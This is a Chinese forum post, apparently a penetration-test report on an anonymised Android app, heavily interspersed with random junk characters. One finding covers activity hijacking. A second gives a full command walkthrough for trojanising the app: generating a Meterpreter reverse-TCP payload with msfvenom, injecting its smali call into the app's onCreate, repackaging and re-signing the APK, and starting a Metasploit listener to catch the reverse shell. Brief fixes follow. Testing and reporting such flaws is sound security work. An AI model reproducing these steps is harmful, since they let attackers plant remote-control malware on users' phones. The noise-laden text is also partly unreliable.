' ?1 u% q" w/ o) d1 c7 c. a' K' }* I 7 e p7 O( K& {/ n. r. h3 Q F; x

. E5 B# g# v2 b T3 X, p $ I R( h v, R C6 U5 p! h$ Y( j& M' M   5 Q( v6 X# P/ f1 P; L0 p6 g + r+ X: c8 u5 E8 b# ?, h& `

+ Y( [1 A. o- V& H( V/ m ' p7 p6 }1 j6 m2 G) D% a, r

1 V' r" z9 s0 |& }4 b1 X- L+ I ] $ Z$ p5 | G4 g/ `! b& T4 K1 l 1-2 测试结果 + d$ p* Y! f, U7 Y Y6 R9 S6 ]- x$ m6 j/ B

% g: h. q/ u( E" z ; i. `; z* k8 k4 G( a( Y( [& N* g

& Z4 W+ @; a6 g" s6 G+ j/ m: h & W7 _) n+ ]0 v   ! b$ O! }% _+ u0 h/ d/ J' m( g2 ?9 [6 l* m/ @ R4 J( g

/ [! A* T! E1 X* V f9 y$ G( Y+ @7 y3 T

" J& W+ \% _0 ?- o $ a+ C" u; L7 |+ v$ p I 2 检测结果                    2 F8 I' s7 ^' D * p; J/ X" J8 q" ~ _

- P" V1 p" ~( g0 @. }2 @ % p+ H8 Q( x% t

! r0 b% Q( h9 l0 a, A) \ 2 [* Q& {0 V( } 2.1 某某某 ; p6 c! w6 x H+ y ) s+ G" G4 X! U8 c

/ X( N3 ~+ u8 b/ n' A " |4 s3 t6 `2 n$ L8 M' V+ p

9 d5 z8 A s( o+ r' }' Q6 B ! p, a. v) b' @* x 2.1.1检测目标 , Y8 i" v3 P, x7 O) q 6 O" P: | K& J) i8 f d( |

5 |* [4 R$ S' |! y0 d% B1 b3 j$ Y 6 S) |8 o8 }! ?; t- f. m0 t

- U7 G3 A$ v& w6 o# T 2 g" }4 S/ \- u8 @3 ~8 f 目标地址: 某某某某某某APP ; `! }* c. X( d* \" h+ |$ H! v F" R, X' |' t, b

0 n; _7 K, w4 J: t- r 3 y: H& n* i; L8 m7 C

9 Y H @& r( t8 T! N : L5 l. |! p7 l9 `, v 2.1.2检测结果 $ U, t" j. T, B( N& n! h! P : v3 O+ \7 M- }# j N

0 } P/ K+ B8 T4 @4 S6 s 8 |# ?) Q7 o; S+ Y/ {+ [. c# l

8 _$ L6 n8 p/ F , I- L+ v5 ^) ^: B 2.1.2.1 0 W0 N, e1 Z j, A4 N: R+ s$ J 7 J+ H6 q& n! _% A2 g

6 R, c( \8 e; i3 ?# ~9 s5 d$ y- }( N 0 I- g8 p$ M2 z

8 r( J& ^) q# T6 @1 ]& {, H' x& Z% ?! a 1 f$ |* O* s9 q) ?% V \7 i6 d1 Y 漏洞链接地址:某某某某某某APP ) U7 u1 ]4 S. P1 ?! {+ { , ~7 d8 F8 i1 [' c

, ?" f! f. F! X# B' W8 [1 c% G 3 J* u2 u& E5 R2 Z, r

; ?- C" M2 L" y' G$ k# f & }2 M% _* p" l   2 }7 K2 G' l. e' G2 D3 X3 @) f2 x& n+ ]% x8 w, P

. f, y2 l7 E6 S% C5 b0 \9 I- h 3 b& c/ P' r' `) O# {

; k* u; _" h4 h/ R6 n+ L% W/ k) q' A( L( i4 s 漏洞分析及取证: , E, `; J' |4 W9 ^% ? , Q6 _4 K$ e8 K

4 p! l; J# X3 i& a " c3 w1 R4 \, W2 h3 i; ^

6 f; f$ ?$ s8 [' B( g * j. G: x, s1 \                  通过androidkiiler反编译,发现app未进行安全加固, Activity com.minivision.cmcc.activity.SubActivity可被劫持,复现漏洞如图: - a# h8 w1 ?& l4 r/ N' O* h+ w* X4 r* [' b' S7 E

0 t2 ]* z, e6 r$ |# Q! Q $ R: n/ O5 k8 p0 O7 ~9 f

2 r$ p4 Y; @+ M: s$ a& Q ]9 M6 u' p4 [! P      + s6 J9 T( V F' _: v5 E $ D9 m' b4 t Y9 _( r# |5 a Z" Z

7 }" J' V9 R2 a( y, ] 7 q. @% X& |4 p( K& x% Y" L

* W) \8 S$ Z0 |& w/ B5 N 9 Z) H' H! R1 W+ n- V                       " y1 |# h; H% V' w0 v/ \7 _$ i) c- S/ d2 j0 t

$ F3 U& u- J9 I + V0 i& q( B g

5 M$ O- y& w6 S9 |: T 9 P4 y" N+ `. ]1 p6 I. q# r ) X/ h3 s4 B7 u2 g& X8 I 7 X# Z$ m2 N5 |8 k2 p% e

% \4 y* w2 M8 q; T* T 6 |# a* E" |4 g5 ^$ W) ~4 |6 c$ V) L% {- d

) z" a9 C$ Z2 y6 i8 v, C2 G 1 M, f* P4 Q5 v' t. `7 Y( v% c 1 n9 X1 c% w) E( I; T+ T2 r5 x q

2 H/ u6 n9 W# r! z+ m' B4 I; O: O; | U1 s/ Q

8 @* W( O2 V- _" ?$ F* J4 B: k 4 @7 O1 \6 `. d8 z7 {3 H5 G* J . F. x% d4 `& q8 M) P ' E9 ~- V! g/ v. N$ n

F" ~, p" g# t& h 8 c7 Y% ?1 M9 B' M

) F5 G1 M6 Y# H: d- X8 N; f 5 t7 G" y. n# f, S( c* b9 C3 d- v3 O6 [ 漏洞危害:高 , x" `' D I9 f9 L& d' q7 b 1 P; g [5 ?) U6 S9 q

4 \' |- @4 K1 ?2 d! j0 D6 K ' H, ]1 e3 ^1 s1 t8 W4 I
k; ^: U' {# m+ p. c # b+ t7 u% a' }$ e' C3 d$ w# E $ x: k; q+ N; u. \- F* i0 W1 i1 K- A1 r) v# N" Z E9 _ R! Y8 V$ B. }" s4 x* Y% g% l6 i$ N8 _" B2 b+ f$ M& K/ r% x; V2 _- Z' x& }$ f2 R6 K0 ^7 z+ j1 V% l; g' o, |2 \: ^# N& Z7 C9 D' c. W2 _+ |) i* H% i) J" a5 s+ t# L6 O- J; v+ J# s' f" f5 k: ?) e) G6 _+ I/ A* B! C! I' k% t# e2 u6 m4 B: v! ]7 Y0 e( C/ k3 E( ]; v0 o2 n2 ~. R; I5 A0 g( v2 t T$ Y+ w4 P( }) t3 ]8 [, a5 U, x" u* N% C6 H7 E' V' H$ q0 g w s% |8 ~% D2 M0 g u* C( s2 e$ @6 J% A7 T y, M3 Z; n; ~7 \! P$ z# \" o( c0 \) p+ X1 C& W" s% L/ a" I7 n4 Q7 E: n3 _7 A0 o( _, ]. k6 H. T7 [+ u% _) ~$ i( \ y
, ^ J9 @) v; O) l9 p # p/ g6 M( e" w9 E: D/ w4 y4 ]

, Q) L0 i( Z+ O% L $ s9 L+ K3 Y; |& }4 m1 j+ h0 Q# | 严重程度 ) u$ k/ G7 I7 c* z* q3 t6 F# l4 l% Z6 e9 q5 Y9 \, g; o, _0 v

$ Q U$ v# U3 F+ f- U k) Y8 g
3 \' q8 Q7 e8 H7 n+ r# [5 \ + W# ]6 h: h, ]( u7 D$ x0 a' Z/ @5 @

1 i0 d# Y7 P- a+ g5 R9 g : u7 F" z# P* v; W* }& w+ l: t 2 M2 m2 x# E' R/ [4 b 4 r& i2 \/ p% o4 q( ]' Z3 ^! l( z' X+ L7 ?

( B9 F' v0 Y0 H8 N' q( b* N5 w, `/ f" X. l: v/ K+ s. @
9 q [ U b7 w/ r4 h . |+ |# R. O6 s$ D' S& B5 z6 |, m

& S' r( O( l9 w/ _ ( k% U+ [1 `3 {+ S " K+ k' K$ I4 g w3 M/ a N% X$ W) h7 o/ R/ a5 F( }% R6 D" ~

4 l, x+ ]6 b* T # n+ Y. [" q/ f: @4 h) D9 g
" j0 |* S+ ~+ k/ g+ B s0 B) B ) q% z: n J+ p$ Y

. Q k d3 T9 m' p! ? ; i4 s3 n2 l8 K, e& R* k" }$ ^% r 8 a$ P6 g9 r. K& r7 {2 n : c+ B* y, C/ F& T) k4 b1 ?

1 V1 x. g. [6 r& g/ I6 D 7 A6 q' h, f, [) j$ n! U
$ G3 x. v/ Y$ \ % l3 ?* o6 w( o5 _/ s% m( H. |1 t

% ~0 |3 N6 E3 Z' l, a$ g( _( A " {9 n: k# X6 m7 p; t$ B3 i   ' X0 H! y2 j: y4 E" F- o& \7 e2 p6 H' k2 i

' {- Y# @# A7 t5 E7 O+ r7 @ $ `# ~, K6 B6 I2 Z$ N7 V2 Z, ~8 q
6 J2 Q/ O5 n% z/ [2 l: S' E, D2 ]5 d" z

: V7 c* q2 F$ R9 f \. G . K0 b5 S/ z: Y% q7 c( z9 U . q0 W' N& b* r! }- A! w2 D; J/ a , X% b( V# [* `' R: b+ p; s

' h4 _7 i( j7 t5 O 7 L u/ V4 Z L# f' v! y
% ]: U9 o$ G/ q% c+ K7 K / }$ N# f) {3 N6 b- p5 Y

/ C) ]7 v: ^) S3 ] 0 ~$ C4 U0 R" A: g& X   ! H9 i- B2 a3 S1 S6 J0 K; m ; r3 |! s, b7 i5 |( ~' P- _

+ L" S6 [; @! P& s9 f+ o , }3 a/ ^0 k/ [/ r6 i$ r
8 P; [9 K& x+ S& l) b$ A ; u- Z4 k1 s+ E1 e2 O( q
( [: D7 x5 T: q- Y" r1 G3 b - H5 N9 ^. d# g1 [& s7 y$ q' Z/ R3 j

- g6 ~, N2 \7 K0 c; w& U$ {% M( N" ^4 b! x: ]) {% L8 S   * x7 h. U6 l4 @3 E . Z* ?, k" F8 S6 D1 m- F0 q

4 m, v1 \, C6 d' H 5 B; l1 g' L4 ~/ n: m! c- g/ e1 ?

& j! H b: L! {; Z5 n' V, Q , D( I, |& Y* b2 `3 G% M. [( J 修复方法:在 APP Activity 界面(也就是 MainActivity)中重写 onKeyDown 方法和 onPause 方法,当其被覆盖时,就能够弹出警示信息。判断程序进入后台是不是由用户自己触发的(触摸返回键或 HOME 键),如果是用户自己触发的则无需弹出警示,否则弹出警示信息。 * S' b& u7 } g, r) ]3 X4 M3 }4 Q

3 h! g' u/ j% s- e % _7 \1 o; O8 S& V0 m4 r

" C8 j2 H5 O$ D + g# f' I# O! {) l1 w6 s( A( U           , f( i3 M2 d8 s* I: q1 q# [" z- m / M" V' W4 @. Z' g& [/ c3 i, q2 W

/ p$ [! w9 x0 q ) m7 T. g! ]9 M; A8 j/ A/ Q" s# B

5 F% E0 `( [7 j$ j 9 @! C! Y" E2 ^9 E' w   + M) i) D$ z2 m( w% b" V$ \" G+ s

2 }' k$ [6 v$ }/ y6 ~4 L% x- X5 k' Y6 N- X- _/ ?3 J8 h+ L* T% [

5 Q( G7 z6 R Z) ?- R# s9 X! ~ , P1 j) _+ l( m9 H8 K 2.1.2.2 4 N& j, C$ O/ C! } d 9 k. I1 ^- ]! b

( G- \0 v: Y+ e) [% a 5 b' e- G( X8 P1 d( p; J' k

$ A" L0 r/ w8 x1 f3 T8 }- m , d- t/ D% E" n* {. c+ Q' q 漏洞链接地址:某某某某某某APP 5 ?) E2 z# E, G & x8 F0 o8 c+ X

9 T. M* o4 R& c( p + h: U1 c! x, S3 P

( I0 e" ~! ~4 A+ L: { 4 x' w5 Q' K9 N0 a; G 漏洞分析及取证: ; G$ y7 R5 s$ u7 {" f% u e 9 I) _8 B A1 A+ a; k# {, s

$ k* }+ j f% M) W7 ~ 2 o$ r, e0 F- O. J

* d$ S( I4 O3 w2 k/ z 6 T; v8 P1 l0 f T4 E+ Y6 @                  通过反编译,发现程序未加壳加密,可直接反编译获取源码,经过测试可修改app代码捆绑木马或者植入广告等操作,复现详细方法如下: 3 W* Y' s% W |1 q/ k% i9 @ $ v* t- d7 o+ D' b$ Z+ ^

5 } J6 _& U; }3 N J0 M- y+ K7 P

! H1 ]4 ?" t( ]9 [( J2 F2 f2 \ A$ r3 O. L# M- J; C7 O Metasploit 生成木马 apk 8 I/ m8 {' i$ L# f" r' i/ @- J + g5 k2 B: d$ r3 B$ C* ?

( J! W5 `' z9 I3 O) a3 p : m5 y7 ^8 i+ _; o @

) Z! t0 ~% X. N+ p+ z; J0 K& t6 O6 n% ^ msfvenom -p android/meterpreter/reverse_tcp LHOST=192.xxx.x.x LPORT=4444 R > cockhorse.apk 1 Q# N1 q/ C5 @! o Z' K$ p$ p * V% S v& K: K6 t2 W5 L

$ E6 k' X" N8 x; F" g5 ?0 f! v" Q! \. r7 c/ X! o2 h: f

( H1 e: |" ^* P) x) x5 R1 L 8 F7 `4 I2 A: [3 }7 m 反编译目标apk和木马apk ! n+ M( J( W: `. P) z1 `) j' x # | v$ K) Z7 \

3 x8 m# b" }: E9 O5 N! X: B$ K& `) ^# Y, D

7 w# D" |( `8 k* s2 v7 x" ?, ~' a3 o2 L apktool d target.apk
4 h) U( w8 x+ u+ m' u H2 j( M3 T7 @2 i8 k apktool d cockhorse.apk
' L4 R% h% D" e; U" z( u$ X3 R/ a 0 S* W, c8 J# t+ n0 P1 `/ L

( H7 b$ N4 c! i8 y8 G3 C4 X2 H/ T( e# s# v0 |- J5 H$ `

/ U* Z7 `0 J/ R, a4 ^4 y2 {5 z) x h# n( c5 B$ M- b 木马 apk 注入目标 apk * y7 |; b5 J- X% v: K+ N7 G6 I 4 x1 e+ u7 u! F4 q

- a a! B2 c9 |( O + j9 Q: l7 s% H2 P* _

# Q( a' p' w+ d8 [+ B/ p. Z3 \ ]/ ]0 t9 ]6 `) H% e 在目标 apk 反编译生成的文件中找到启动 Activity smali 文件,并在 onCreate()方法中添加如下代码:
) ~9 ^( {. {2 c6 s' Z, x6 B ( v5 ^2 `6 a: A' F; n invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
* C9 I! O# I1 I5 C / f D7 e4 G% V

. F! U2 V0 D$ i% c 5 Y0 [5 A5 {8 J: E( p" Q3 }

8 S$ [3 D$ b4 S/ \$ @ / t, L7 U. t: X+ f 将木马文件 AndroidManifest.xml 中的权限放到目标文件 AndroidManifest.xml 中,去除重复 4 P& i% T( Y+ A 7 t& d# i& q' P' q5 I0 `

( P+ C; c6 R r4 g ( n/ E7 a7 Y, s& t, l

# c8 b6 B& m+ g" G. Y- _ 8 f* H8 Z1 Q# J; r: P 将木马文件的 smali 文件放到目标文件下,例如 com/metasploit 文件复制到目标文件 com/ ' X$ A6 x0 a* `' D8 } 0 i- L4 B! b6 J# A

, t" s. L# n Y+ K, F, d; W 6 j2 t" S& X/ M( v

/ ]9 K% V% j4 D3 v$ G Y5 H, o0 g* Z 回编译生成最终 apk 5 i, y. s" H1 l6 i* ~ * b# l6 L z0 }1 \% z

3 X# K" F; q3 ]2 X- x7 J8 J* R7 V i1 F: n3 I' @

9 D2 P. o# p' m / _5 m9 x9 P4 h) A. ` 重新打包 2 S S0 _: Q" i% D' O, h$ Y: h2 W" `7 i2 x

/ O% e9 V7 k1 D o( U. U4 ^ 0 p L' I$ z' Y8 q4 x: K( R! |

; V9 d/ Z% J8 s. c- `8 V . T: f, ^* W c8 ] apktool b -o repackage.apk target_app_floder ; @- j/ T/ r& l% U1 g' m0 Y- F. Q0 E. e

2 U( r5 l5 x* t9 c9 Q Q # C G3 [: W# @2 B3 x5 j8 j

+ d7 I6 _0 t( s8 B$ y, W ) x1 ~1 e* |3 s1 R7 a% B6 a* h1 x 创建签名文件,有的话可忽略此步骤 / G# M( N' ?* B$ K% ~ 6 ]; h7 Y' s+ H- ?: A3 j" z4 \

; I8 P. J. }! \6 {( X8 k % A+ F- t6 z; m }

, [+ U$ m1 \0 T6 o) }, J4 ` + @0 f1 J. n+ \2 b+ j! W4 H0 p keytool -genkey -v -keystore mykey.keystore -alias mykeyaliasname -keyalg RSA -keysize 2048 -validity 10000                7 H2 k% r% y) u# O; W& n8 F3 ]8 y/ m8 s% _9 w T8 S- c4 N

3 f( N+ u# W: L F, l( x8 p# ^& k

4 V0 L6 j/ k J2 {) o - g4 k+ T8 |1 t) U G3 } 签名,以下任选其一 ' j" D. N, @$ c4 m2 ^3 H 0 u |! O/ w5 a: U! P& d

! p6 o" a2 m) g9 q( {0 P: k) R# I' Y/ x% t% {5 m7 M) J

! ]; t* k/ c# f& B+ w 1 K; y- s* H6 {) a& o9 F$ V2 Y1 R jarsigner 方式 9 j n g' ] Q% R/ o1 s; i! }6 N . H. \; l; C# l" E$ G

8 h& p3 J* A' { L5 u 3 {& u6 N9 b1 ]3 u3 z3 X

+ j0 e' d, R6 ^, w! Y/ \, Z; E9 L8 O jarsigner -sigalg SHA256withRSA -digestalg SHA1 -keystore mykey.keystore -storepass 你的密码 repackaged.apk mykeyaliasname ; T5 e" ~6 `: U; g " s- L. _# U. p/ B6 V" Q, {! q

7 f# a8 s; w( F }0 |7 i- F3 p, `7 ]- ], y

5 ~) T/ P% v- V' [& x- D+ D2 y# ]5 N$ Y apksigner 方式 1 u. U% [$ t0 l1 p5 ] f' c8 c( w3 e/ {

9 P' P# o1 H& e9 g B" z2 M* c & M7 e; z2 S. H# K' W

: J1 v5 _1 O) K0 q0 ` % p+ {/ E+ u7 A' E" e' d apksigner sign --ks mykey.keystore --ks-key-alias mykeyaliasname repackaged.apk - g- b- |- }( x4 R8 j$ k9 s; ~8 k9 o/ X o

' n; \& K+ Z7 a& S' k1 p" N9 Y5 m) ?$ p

- [1 S( K$ a1 @5 N % r1 _. m4 C0 B 如需要禁用 v2签名 添加选项--v2-signing-enabled false - l4 z" A) o- y/ M. L3 x ; u2 R. ~6 A0 _; O, d% G# f. ?

$ `; R. _7 n# c, y# M" ^' _. V 9 m& m3 Y9 E( U' @' m

- n# j3 } a) l" ]. h6 V* D; T ' L' B4 @, m3 m3 W. G& {4 D. A w 验证,以下任选其一 & n) s9 f/ V+ p! L5 z! m 4 z/ E; X. P) S% v9 ?1 J. M1 ` s

3 B% } U% _6 o" ^ ! N. w1 O5 a6 w) h9 v9 A6 p

! w: a, c8 s5 t$ R4 l+ U % b( h+ F- N( f9 I0 d+ g* B% P/ |# `( g jarsigner方式 2 |9 p( r: l0 w$ v- L! c6 e 0 _) z8 |3 P( ? T8 R

5 L( q g0 a6 m g& a & g1 f2 X& C/ q. s0 x: z0 B/ d" H

; y& d% o% b5 \$ h0 }% D / Y2 }9 t0 B. |! D jarsigner -verify repackaged.apk 2 U+ O. h# {* k 5 B& j' e* k2 O0 Q/ A8 ~

! Z1 T( a9 O- \; U5 s9 s 5 U, m' k6 J8 H% [. R N! Z- L

0 }. |9 U' v9 f! _* x" `+ J , \- i7 W! _# }5 v( H$ n- [) y apksigner 方式 4 t( Z. }- P; w4 ]8 h X7 m3 T8 W e8 t3 t+ G, ~4 V! c3 }; n

5 }" Z! W% Y1 X' D2 r) ] ' N# W" ?+ j7 s: W/ m( |3 Z; e8 E; h

% I" t' I) i: t ! U7 U4 W; q+ p K7 u apksigner verify -v --print-certs repackaged.apk " N+ Y$ O: J7 y" A4 K 3 K" z) N* @* |/ B% `" p

" e: {2 m M; y , w1 @3 Z% j. u' Z6 w% R+ K& [

' m3 [% w$ O3 k 5 q, a# e- R& Q# X- _: ]# C# G* u keytool方式 7 q) ~( ?- x ]" I) ]$ @" V4 f- B5 C

0 }. k# D1 X& B* _, E. h 0 W) n9 @ H3 a# ^. ?1 N% {

9 G) A4 a! u: p5 A . F) l. C9 l+ w. d4 @" j) E3 i keytool -printcert -jarfile repackaged.apk / U# |" s3 X0 U; F+ @8 ~6 w 7 p/ ^ t* j7 r* {0 l% G

/ @" G7 f! y: F7 [ / Y0 n6 F- R% `4 K' H7 k# D0 j

2 _$ _9 f% o) D' F4 o; ~$ {* Y6 X; `- Z- h2 R/ O9 i/ u 对齐 , h# n/ } ^) I, [( _0 H2 S& m' {/ {# @' w# r2 y

8 n+ m1 v+ P" x. u. Q1 v; K8 v1 F& v9 B( L: |$ z

: v! b/ v8 P) K8 X# @ $ ~' s, l( t# k/ [1 |/ v5 e 字节对齐优化 - ~: S ] r6 M3 H4 i5 I' m & B' I: l @5 ?: I+ U( J5 |

3 Q4 m) v; ]8 m) _! f$ a# C% z2 R3 n3 [7 }, c# y2 e

) C3 M0 W) S& J8 s9 a' l 2 C& f4 ?& ?0 c- }) V' ^ zipalign -v 4 repackaged.apk final.apk 5 L0 Q; S2 i0 L, l; U# Q3 ?3 n 5 p5 t: j& d8 Y# Q$ u1 k+ D7 z

3 s H: h+ O" Q, S4 Y- r , Y6 K8 f% h( b0 B' J* i6 ~

/ D" G0 H' t# D+ }" { 6 w$ D# B8 ]6 u, K- {5 k 检查是否对齐 , [; R4 b" X' u! G6 @- Y Z0 M 9 q1 o! J5 F0 b3 W2 n

9 [ Y" t: i2 L0 a3 l* {! t) q7 ^% _1 F$ u

% I2 E; e& a& ]! B7 F . Q6 r8 q) ?* _) l9 q `5 T zipalign -c -v 4 final.apk 2 o M4 I# M( R" l' Z o & O: s e6 O: P+ C3 i

- y/ ?/ t1 @+ r2 c- }$ M 0 n3 b5 E" o" C* b

. ~( g7 q# B' @- Y: f( i ) q: S; K# s6 N 注:zipalign可以在V1签名后执行,但zipalign不能在V2签名后执行,只能在V2签名之前执行 6 J9 n1 D# y$ C' {; i4 b/ M2 k' H/ D; A1 \

6 M* M' P P$ B2 W+ W) w0 Q: d3 D4 ~/ v! _: ?" b: P+ ^8 X

6 c6 t: L/ K- b, a8 N' ? / h: y8 _) m/ I) ~7 V5 B 启动Metasploit控制台,配置参数等待上线 : K. Z( ?2 @1 j$ S" f' g + _4 {/ H4 U0 ^2 U* t$ v9 W) Z0 x

8 i9 j( E, @' _, n1 N( H) n / \; R! x( ?- \

" c' V" {1 |1 T! \" D " X5 b5 o; Q8 D$ h$ `0 g* M 在终端依次输入如下命令 $ }& t0 ^/ b+ t4 u5 H; } M @$ d( s- t+ F5 l2 ~/ c

5 c/ V/ m& ?4 l/ z+ T6 w 8 o! {7 e2 o6 v2 o5 [. B7 o

8 k# {( A( c7 G/ \+ k5 m( ~) r2 K% _2 N- F msfconsole ! v; R4 P1 e2 M d, x. w " c! P4 X& l2 e, C2 ~6 t

: L% Q" T, P, Y) L- d4 o1 q5 J 3 L, J* t7 F1 _

. K( B7 U: d1 ~0 I2 b' ~% b& y- z f" W$ d use exploit/multi/handler c Q7 Q2 x7 { , }5 m+ |1 [* }. D

4 j4 q8 L! ^% h ( x7 k/ X& G$ B2 H8 T1 j- M

4 {7 s1 R5 P: M7 T- o" g$ z% j7 H4 ~8 v( B) z- l3 g set PAYLOAD android/meterpreter/reverse_tcp , C5 q* r! v7 e5 ~9 _% S2 {& c: Q! W4 F, q4 K$ A- E: ^' Y

. t9 {" Y. q# P/ \6 P: M $ G, K6 U1 n: f& n

' z4 N6 ?/ _( r( k: X& d# f8 E) |+ _6 o" `: H4 h) U set LHOST 192.xxx.xx.xx ( ]3 c- q+ |5 x1 L/ ~ & X7 T2 J6 j( u1 ^0 @

8 y9 n, \% ?. k1 m' V ( Q, {- u5 E, w2 G

$ P1 B4 }* E- k; ^$ }+ O# l& V2 s/ g' G" f6 {6 l1 }2 F* l! @ set LPORT 4444 $ k' o7 r6 x0 [3 y& G4 S. V3 X5 l2 y+ `% q

# T1 v1 h& ~1 U; J; N5 O1 I( W2 K7 ], |' B+ I7 P1 s k

7 L9 l- D* k9 @# S9 s; `0 a' ?3 E 5 i) U3 V2 ^" S/ \ exploit . [8 I N8 ~) Q9 }$ n& B& c" M5 } ' H1 `) b: {! v: w

" b7 o, T# W; K8 {4 L* G6 B4 X$ o' r% O/ X2 L, W$ l( P+ y

# J3 e7 p" V3 [/ }1 S+ O0 d ( F, O1 u' L; U1 |9 s5 c$ _0 O 之前我们把入口放在 MainActivity onCreate 方法中,当启动目标应用进入该界面,就会连接成功,如下图:               * X- b! F0 S! F9 {3 B / O: B- i4 B7 H' ]) Q1 L

3 N5 A4 g" U: j" {& P + m! z; R6 W$ m6 i( ^. x" r+ h" L) ~

& P- P% _6 m# C. F+ h! e : a& V1 U) C0 |' k" R$ ^5 l 漏洞危害:中 5 t+ S& m4 k- `' Y$ S/ R3 T2 {4 D m

1 J% h3 y& s' _4 @* o 6 z2 C ^" e3 Y- v
% n, J7 ]0 Z. Z: t: V) m. o ! B" Y. z, e. _+ z & c0 U0 L- V' a 3 d# s& I7 V& o" T& g% v6 ^ 6 w; M r2 ^: z1 Q+ `0 w' y* Y; _& \1 z, ?) k, q- I. k$ u, L2 d0 W7 i! D4 b" m. g) u8 a8 e4 j$ t8 V8 h% T$ C+ F0 ^6 Q8 a0 u& [; f6 I. _9 w4 I S% f# c2 g! o+ A! _5 t4 U. I' L) z2 h; D& r# Z) d4 n' |+ \, D0 ]- s% t9 S$ p- m+ @7 [- d: S8 |% }0 E6 T- k \: Y" L' g& h7 N& ?+ }- G4 U" f$ {. G# i1 ]: ^8 y( J6 C* o B! f9 ]- J/ K( `2 N, S5 `6 G8 _) R+ j# K4 V. C9 ^5 h% u. w: B! J; T- L6 q" ?9 J3 o! M- o2 J8 j% M: X6 t% s7 C* Y4 v: W& V: h7 {& I: B9 T( i8 T" V! t, b+ O3 T( `. z" X$ X e; i) e0 a( _1 a6 h, b- x Z+ p( Q9 W$ b6 E s0 s, |( f; ~2 P. L8 Q7 X) R! u. a$ o' `7 ?( H+ B3 j1 J8 f2 N1 |( M' C$ b) L8 B: K7 r
% i% [" O0 Q3 f/ J J4 o) L% l+ E9 s' }: ~3 O

$ I% J* v. l& Q& P5 F1 D ' C2 i! O/ v/ q$ R 严重程度 6 ]1 g' t: x$ [ 2 S$ j' C+ [* O3 T3 g

. T# J+ S3 n; d3 E0 t $ o# q8 W( y) P# A+ @
( K' t' t3 j( U5 F 4 C S5 v& Q# F/ H; w

/ l& c$ M) r+ d8 O2 P) q4 J! q( o& a3 ~" B3 r3 T% [" ~! x2 m) O & E6 B! r& _! ~ : X. k" W; q7 r0 e# O0 ^; p

. [" M3 R8 E6 @ % S/ h* m, L' Z6 D0 Y
( T3 @. V# Y5 B3 }# {2 \# E6 J+ X+ I8 H

( |8 A6 u; ^ Z* a3 @6 [4 `$ ? & A- f4 n, @# K( {- x: r5 q0 b 6 r" m( ^( T" i X" h / ], O( z/ ^8 o

" ]: j s# x) J. \7 i) @ 7 U$ H( Y4 ]3 D3 W1 }% B$ c
$ r$ ^& L' x% S' R+ ` 1 @$ ]1 Y+ t7 t

: y+ c+ k% v& R, j7 X( K - B6 ^/ |# L" w9 P . {: b1 A& O. e; F / q+ ?% f6 }+ a# @' h

& n- A- i$ o( u3 W( H 6 \8 M1 h) m8 t" ]4 |8 c. Q$ O
$ h; J1 G( x2 H4 F$ ?' @& e, @% `0 p# s; ^8 l 8 f: K! d1 @( k( m2 S k1 w $ z5 E5 h& X7 \; L

/ U1 `2 c/ t( E4 G * k8 a, x6 R8 s/ e8 Q5 w) y8 p   ; ^$ c* C' ^: j" l 5 D3 _6 A- c" m( F* ^; o# r6 Z: K

* R+ f, q" ^: f% h) r# j ' C/ H8 a0 v1 w: e$ a
1 d) c4 P5 o4 u+ T w* V2 P: Q 8 ` H3 d" W7 Z* q% u2 [

9 Y! _9 N& p, s* A 2 r( Q& A) m/ L. U9 U 2 v/ M' b" Z+ W5 S9 O2 k, f& ]% k" i+ o6 q2 B

, h8 w+ P% [: c4 Z5 F + y$ c% V: u1 r4 V% W" I
U8 q* h9 J' y+ \. q- H1 o+ S$ u% t4 n" m/ u" J2 X# d' L $ J( w8 ~5 U/ e " Q4 Y2 X! T2 {. h$ E

& b: v6 L& m, k4 [" x/ L- M6 F4 Q4 j1 I( U+ X   : T9 b2 p+ Z4 C. C# C+ S/ Q5 e; F. A, c( k6 \1 o" M3 y) o

, R" p$ [7 F' m+ e* |( z( K 7 V) v7 _- N6 j+ f1 G
, U7 \8 [ l5 G- W9 `8 l# [" b / k9 o. r& _+ R
9 G$ h4 c4 D) A9 T/ I9 U C" T ' o( d9 N5 \6 R I' z

# y$ N3 S7 v, t: a9 J: \3 E( {. Y$ d, f4 f# e7 x/ M( ^/ n   , o5 G2 u! B% Y# Q s1 w3 Y3 { - \# q" X4 @: v

# G4 M# w9 y! F: F6 o- I2 ? $ n6 o2 B9 |4 d% I* K/ C1 R

% ?4 x4 a0 k" u1 T) K; [* C( A 1 }$ ~/ j3 R; w. `: J3 i0 o4 V 修复方法: 9 N, Q8 u9 b2 N) l* O. N/ t v: _6 G% w! `; h! |5 Z4 e

8 W* F4 y8 | T+ v6 ?2 h5 g) m0 z/ P9 ^; C5 w) e

3 s. m x& w( j& D ; F z. C' \ |6 W* ?( o/ C) w& g               1. APP 启动时应做签名校验防止二次打包。
9 q" R4 I, p# K( B/ u& ~$ G ! a$ h! o2 h( L3 i 2.
建议采用客户端、通信和服务器端联动防御方案进行安全防御。 m9 O) h2 C+ d l0 c9 x& q1 [0 O8 S7 x7 ]3 ]6 y: Z

; o: O1 j6 L$ t$ O7 X - T) T" p5 C& h 6 V7 ~! Q3 F% j0 L! g2 W K2 g , H4 S% @, ^: X+ Z/ v& @

- G2 C+ A7 r1 F$ t. r! d% a d `5 g: |, N9 `/ p   ! }7 k: ?7 `* n" T! s* w # U; u5 Q) q. K$ G* M% v5 x

1 m. R! m0 i5 Q% H" ?! Y) s% Y7 |- _$ Z ; O E2 E1 a; |! b; Z7 x - l7 A8 l+ z0 o, M! M5 t' p: G

8 t, X. x5 }/ W3 K0 Q* m , P" P1 f5 [+ l+ P* ^# i- p
; n8 Q0 g. N4 D0 E: e% k. s " V$ e5 I+ \; Q" p

8 ]% R2 r" t/ U9 u! E3 V' _0 o ! R7 {6 z+ R" l
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表